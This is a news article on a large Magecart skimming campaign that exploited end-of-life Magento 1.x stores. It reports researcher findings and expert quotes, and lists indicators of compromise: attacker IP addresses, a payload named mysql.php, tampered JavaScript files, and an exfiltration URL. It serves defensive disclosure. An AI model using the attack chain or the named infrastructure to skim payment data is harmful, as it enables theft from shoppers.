A large-scale MageCart campaign compromised users’ private information in more than 2,000 Magento stores, according to researchers at Sanguine Security (Sansec). The automated campaign reached tens of thousands of customers and is possibly the largest Magecart attack since 2015. The largest Magecart attack recorded by the company involved 962 stores.
The researchers noted that no administrator account was required to perform the attacks. The Dutch cybersecurity firm said the attackers executed the attack by gaining write access to the server through zero-day vulnerabilities in Magento 1.x. The company noted that an exploit kit was recently for sale on the dark web hacking forums by a user named z3r0day.
Outdated software vulnerabilities have exposed Magento stores to attacks
Most of the affected Magento stores had not recorded any recent security incidents suggesting that the Magecart attack came from the software used in the building of the stores. Magento 1.x software has stopped receiving updates since June 2020, exposing sites to zero-day vulnerabilities found in the wild. Security experts suggested that the hackers discovered the vulnerabilities earlier, but waited until the software reached its end of life (EOL) before exploiting the vulnerabilities.
Researchers also found a user named z3r0day, who was selling a Magento remote code mining kit and instructional video for $ 5,000. The hacker promised potential buyers that Adobe would not fix the vulnerability of the software because Magento 1.x had reached the end of its life. Hence, Magento eCommerce store owners had no way to protect their stores from Magecart attack.
Adobe issued an alert regarding a possible Magecart attack on sites running the outdated Magento 1.x version of the software in November 2019. Similar concerns were echoed by MasterCard and Visa. Adobe’s efforts to convince Magento store owners to migrate from version 1.x to version 2.x have reduced the number of vulnerable stores from 240,000 to around 95,000. However, many Magento store owners do not are unaware of the software vulnerability and will likely continue to use the outdated software.
Commenting on Magecart’s attack on Magento stores, Paul Bischoff, a privacy advocate at Comparitech, said: “Hackers can easily search for outdated versions of Magento and use automated bots to access them, download shell scripts. and install the card skimming malware. Card skimming attacks are undetectable by end users, so it is the responsibility of website operators to update their systems to the latest version of Magento. At this point, any website using Magento 1.x should be assumed to be compromised.
Sansec researchers have said that the profitability of web skimming is a contributing factor to the increase in these attacks. Therefore, obsolete Magento stores will remain attractive targets for attackers wishing to steal personal, account and financial data of online customers.
Chris Hauk, Consumer Privacy Champion with Pixel Privacy, says:
“These site skimming attacks will continue to increase in frequency as long as the bad actors in the world can continue to profit from them. This highlights the need for online merchants to ensure that their online stores are running the latest version of software available, which is probably more resilient against this type of attack than outdated and obsolete software.
Magecart Attack Compromise Indicators (IOC)
The threat intelligence firm claims that the Magecart attack primarily affected stores running the Magento 1.x branch of the software. The researchers added that the attackers were using the IP addresses 184.108.40.206 (US) and 220.127.116.11 (OVH, FR) to interact with the Magento administration panel. They also used the “Magento Connect” feature to download and install various files, including a malware payload named “mysql.php”. The file was then automatically deleted after adding malicious code to prototype.js for Magento 1.x and jquery.js for Magento 2.x stores.
The attackers also added a skimmer loader which exfiltrated data from Magento stores to a website on the domain https://imags.pw/502.jsp hosted in Moscow. According to Sansec researchers, the malicious site shared a network with avouen.net, the domain that hosted one of the malicious scripts.
Sansec telemetry identified 1,904 Magento stores with keyloggers installed on payment pages. In a period monitored by the company, 10 Magento stores were infected on Friday, 1058 on Saturday, 603 on Sunday and 233 on Monday. The infection pattern shows that the vulnerability could have affected more stores than expected.